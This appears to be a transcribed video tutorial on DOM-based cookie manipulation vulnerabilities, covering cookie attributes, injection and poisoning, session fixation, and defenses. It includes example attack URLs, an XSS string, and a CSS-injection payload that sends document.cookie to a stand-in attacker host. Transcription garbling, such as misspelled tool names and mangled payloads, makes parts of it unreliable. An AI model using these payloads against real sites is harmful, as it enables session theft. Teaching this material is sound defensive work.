Download this code from codegive.com, link in the description below. DOM-based cookie manipulation vulnerabilities, a deep dive. DOM-based vulnerabilities occur when client-side JavaScript code manipulates the document object model, DOM, based on user input, leading to unexpected and potentially harmful behavior. DOM-based cookie manipulation falls under this category, where the vulnerability stems from JavaScript code reading from and writing to cookies based on tainted data, allowing an attacker to control cookie values and potentially compromise user sessions or application functionality. This tutorial will cover the following. 1. Understanding cookies *, a refresher on what cookies are and how they work. 2. How cookies are manipulated with JavaScript *, examining the document.cookie property. 3. The threat model, tainted data and DOM manipulation *, identifying the source of the vulnerability. 4. DOM-based cookie manipulation vulnerabilities *. Injection of arbitrary cookies *, overriding or setting attacker-controlled cookie values. Cookie poisoning *, modifying existing cookies to change application behavior. Session hijacking, indirectly setting session cookies to known or predictable values, rare but possible. 5. Real-world examples and code demonstrations *, showcasing vulnerable and secure code. 6. Exploitation techniques *, how an attacker can leverage these vulnerabilities. 7. Defense strategies and mitigation *, best practices to prevent DOM-based cookie manipulation. 8. Tools for detection and prevention * using static analysis and security testing tools. 9. Conclusion * summarizing key takeaways and future considerations. 1. Understanding cookies. Cookies are small text files that websites store on a user's computer to remember information about them. They are primarily used for session management * maintaining user login state across multiple pages. Personalization * storing user preferences, such as language or theme settings. Tracking * monitoring user behavior and browsing history. Cookies are sent back to the server with every subsequent request, allowing the server to identify the user and retrieve their associated data. They have several attributes, including name *, the unique identifier for the cookie. Value *, the data stored in the cookie. Domain *, the domain the cookie is valid for. Path *, the path within the domain for which the cookie is valid. Expires / max age * determines when the cookie expires. If not set, it's a session cookie, removed when the browser closes. Secure * indicates that the cookie should only be transmitted over HTTPS. HTTP only * prevents JavaScript from accessing the cookie, important for mitigating XSS. Same site * strict, lax, none, controls when cookies are sent in cross-site requests, preventing CSRF attacks, none requires secure. 2. How cookies are manipulated with JavaScript. The primary mechanism for reading and writing cookies in JavaScript is the document.cookie property. It acts as a string representation of all cookies set for the current document. While it appears as a single string, modifying document.cookie actually sets or overwrites individual cookies. Reading cookies * accessing document.cookie returns a string containing all cookies separated by semicolons and spaces. You'll need to parse the string to extract individual cookie names and values. Writing cookies * setting document.cookie allows you to create new cookies or modify existing ones. The syntax is cookie name equals cookie value, the name and value of the cookie, required. Expires equals expiry date, optional, the expiration date in GMT format, example expires equals Thursday, 01 Jan 1970 00:00:00 GMT. Without it, it's a session cookie. You can use new date, date.now, plus duration in milliseconds, .tout string, to calculate this. Asterisk max age equals seconds, optional, alternative to expires, the cookie's lifespan in seconds. Asterisk path equals path, optional, the path for which the cookie is valid, defaults to the current directory. Setting this to / makes it valid for the entire domain. Asterisk domain equals domain, optional, the domain for which the cookie is valid. By default, this is the domain of the page setting the cookie. Asterisk secure, optional, indicates that the cookie should only be transmitted over HTTPS. Asterisk same site equals strict lax none, optional, controls when cookies are sent in cross-site requests. Strict is the most restrictive, lax is somewhat restrictive, and none requires the secure attribute. Asterisk HTTP only, this attribute cannot be set from JavaScript. It must be set by the server when sending the set cookie header. Examples asterisk 3. The threat model, tainted data and DOM manipulation. DOM-based vulnerabilities arise when JavaScript code uses tainted data to modify the DOM. Tainted data is any input that comes from an untrusted source, such as *URL parameters *data in the query string, param equals value. *URL fragments, hash data after the in the URL, hash value. *referrer header the URL of the page that linked to the current page. Local storage and session storage data stored in the browser's local or session storage. Third-party content data from external scripts or iframes that you don't fully control. Cookies while cookies are also potential targets, they can also be sources of tainted data in the context of DOM-based vulnerabilities. Why is this a problem? If JavaScript code directly uses tainted data to construct HTML elements, modify attributes, or manipulate cookies without proper validation or sanitization, an attacker can inject malicious code or manipulate application behavior. 4. DOM-based cookie manipulation vulnerabilities. Here's a breakdown of the common types. A. Injection of arbitrary cookies *. This occurs when an attacker can control the entire document.cookie string, allowing them to set arbitrary cookies with arbitrary values, domains, paths, and expiration dates, except for HTTP only. Example Exploitation An attacker can craft a URL like http://example.com/vulnerable.html mycookie equals evil value, expires equals sun, January 1, 2040, midnight GMT, path equals /. When the victim visits this URL, the JavaScript code will execute, setting the cookie mycookie with the value evil value, expiring in 2040, and valid for the entire domain. The attacker now controls this cookie. *B, cookie poisoning *. This is a more targeted attack where the attacker focuses on modifying a specific cookie used by the application to control its behavior. This could involve changing user preferences, roles, or other application-specific data stored in cookies. Example Exploitation An attacker could use a URL like http://example.com/vulnerable.html, theme equals admin. The JavaScript code would set the theme cookie to admin. If the application uses this cookie to determine user roles or permissions, the attacker might be able to gain unauthorized access to administrative functionalities. More realistically, the theme might control CSS, allowing the attacker to perform CSS injection or defacement. *C. Session hijacking, indirectly, rare. While HTTP-only cookies are protected from JavaScript access, there are very specific scenarios where manipulation is possible, although extremely rare. Setting a session cookie to a known value, very uncommon if an application improperly handles session ID generation and allows the setting of the session cookie from the client side. An attacker could attempt to set the session ID to a known or predictable value. This is extremely dangerous, but requires significant flaws in the server-side session management. Creating session fixation vulnerabilities. If the attacker can force the victim to use a specific session ID, it can make session fixation attacks easier. This generally relies on other vulnerabilities, such as being able to control the initial session ID. Example, illustrative of the vulnerability, very bad practice. Exploitation, with server-side flaws. 1. The attacker crafts a URL like http://example.com/vulnerable.html, session id equals attacker_session_id. 2. The victim clicks the link. 3. The JavaScript code sets the session_id cookie to attacker_session_id. 4. Here's where the server-side flaw comes in. If the server doesn't properly validate or regenerate the session ID after login, the attacker can now log into the application and potentially hijack the victim's session using attacker_session_id. This is why strong server-side session management is crucial. Important note: modern web frameworks and best practices strongly discourage allowing client-side JavaScript to directly set or modify session cookies. The HTTP-only attribute is a vital security measure. This example is purely illustrative and should never be implemented in production. 5. Real-world examples and code demonstrations. Let's look at some more realistic scenarios and code examples. Scenario 1, storing language preferences. Vulnerability: the code directly uses the lang URL parameter to set the language cookie without any validation. Exploitation: an attacker could craft a URL like http://example.com/language.html, lang equals fr, domain equals attacker.com. This would set the language cookie and potentially set the domain to the attacker's domain, which could be used for other malicious purposes if not properly handled by other server-side scripts. Even without setting the domain, a malicious value like fr%0a set cookie, evil cookie equals malicious could inject another cookie on older browsers. Scenario 2, theme selection via hash. Vulnerability: the set theme from hash function directly uses the URL hash to set the theme cookie. Exploitation: an attacker can craft a URL like http://example.com/theme.hmlevel theme, domain equals attacker.com. This allows the attacker to set not only the cookie value, but also potentially control the domain. Additionally, this can be exploited through CSS injection. For example, http://example.com/theme.html%22, background URL, https://attacker.com/steal. Plus document.cookie, %22 would attempt to set a cookie and then inject a CSS rule that exfiltrates the cookie to the attacker's server. 6. Exploitation techniques. Cross-site scripting, XSS, via cookie manipulation. If the application uses the manipulated cookie value to generate HTML output without proper encoding, it can lead to XSS vulnerabilities. For example, if the theme cookie is reflected in the page without proper encoding. An attacker could set theme to imgsrc equals x1 error equals alert 1 to trigger an XSS attack. Asterisk session fixation asterisk by setting a predictable session underscore ID cookie, an attacker can potentially hijack a user's session after they log in, if the server doesn't regenerate the session ID after authentication. Asterisk information disclosure asterisk an attacker could set a cookie to a value that causes the application to reveal sensitive information, example by triggering an error message that displays internal data. Asterisk privilege escalation asterisk if an application relies on cookies to determine user roles or permissions, an attacker might be able to modify those cookies to gain unauthorized access. 7. Defense strategies and mitigation. Preventing DOM-based cookie manipulation vulnerabilities requires a multi-layered approach. Asterisk input validation and sanitization asterisk. Asterisk validate all input asterisk check that URL parameters, URL fragments, and other sources of tainted data conform to expected formats and values. Asterisk sanitize input asterisk encode or escape special characters to prevent them from being interpreted as code. Use appropriate encoding functions, example encode URI component for URL parameters, HTML encoding for HTML output. Asterisk secure cookie handling asterisk. Asterisk HTTP only attribute asterisk always set the HTTP only attribute for sensitive cookies, like session IDs, to prevent JavaScript from accessing them. This is critical but must be done by the server-side code that creates the cookie in the HTTP header, the set cookie header. Asterisk secure attribute asterisk use the secure attribute for cookies containing sensitive information to ensure they are only transmitted over HTTPS. Asterisk same site attribute asterisk set the same site attribute to strict or lax to mitigate cross-site request forgery, CSRF, attacks. If you must use same site equals none, ensure you also set secure. Asterisk avoid setting session cookies from JavaScript asterisk session IDs should be managed entirely server-side. Do not allow JavaScript to create, modify, or access session cookies. Asterisk cookie prefixes asterisk use cookie prefixes, ___ host dash or ___ secure dash, to provide additional security guarantees. ___ host dash cookies must be set with secure attribute, path equals / and without a domain attribute. ___ secure dash cookies must be set with the secure attribute. Asterisk proper encoding asterisk when writing cookies, use encode URI component to encode the cookie value to prevent special characters from breaking the cookie format. When reading cookies, use decode URI component to decode the value. Asterisk content security policy, CSP. Asterisk implement a strong CSP to restrict the sources from which JavaScript code can be loaded and prevent inline JavaScript execution where possible. This can help mitigate the impact of XSS attacks that might be triggered by cookie manipulation. Asterisk avoid unnecessary cookie manipulation asterisk. Asterisk minimize the amount of JavaScript code that directly manipulates cookies. If possible, handle cookie management on the server side. Asterisk principle of least privilege asterisk. Asterisk ensure that JavaScript code only has the necessary permissions to perform its intended function. Avoid granting broad access to sensitive APIs. 8. Tools for detection and prevention. Asterisk static analysis security testing, SAST tools like SonarCube, Fortify, and Veracode can analyze JavaScript code for potential DOM-based vulnerabilities, including cookie manipulation issues. They identify instances where tainted data is used to modify cookies without proper sanitization. Asterisk dynamic application security testing, DAS tools like OWASP-Zap, Burp Suite, and Akuntix can simulate attacks and identify vulnerabilities during runtime. They can be configured to test for DOM-based cookie manipulation by injecting malicious input into URL parameters, fragments, and other input sources. Browser developer tools. Use the browser's developer tools, example Chrome DevTools, Firefox developer tools, to inspect cookies, monitor network requests, and debug JavaScript code. This can help you identify potential vulnerabilities manually. Linters. ESLint and other linters can be configured with rules to enforce secure coding practices, such as prohibiting the use of eval, or flagging direct DOM manipulation without proper sanitization. Sub-resource integrity. Use SRI to ensure that external scripts loaded from CDNs or other sources haven't been tampered with. 9. Conclusion. DOM-based cookie manipulation vulnerabilities can be a serious threat to web application security. By understanding the principles behind these vulnerabilities, implementing robust defense strategies, and using appropriate tools, developers can significantly reduce the risk of exploitation. Key takeaways. Treat all client-side input as untrusted, tainted data. Validate and sanitize all input before using it to manipulate the DOM or cookies. Use the HTTP-only attribute for sensitive cookies. Set the secure and same-site attributes appropriately. Avoid unnecessary cookie manipulation from JavaScript. Implement a strong content security policy, CSP. Use static and dynamic analysis tools to identify vulnerabilities. Regularly review and update your security practices. Educate developers about DOM-based vulnerabilities and secure coding practices. Future considerations. As web applications become more complex and rely more heavily on client-side JavaScript, DOM-based vulnerabilities will likely become more prevalent. Emerging browser technologies and APIs might introduce new attack vectors. Staying up to date with the latest security best practices and tools is crucial for mitigating these risks. This detailed tutorial should provide you with a comprehensive understanding of DOM-based cookie manipulation vulnerabilities, enabling you to build more secure web applications. Remember that security is an ongoing process, and continuous learning and vigilance are essential.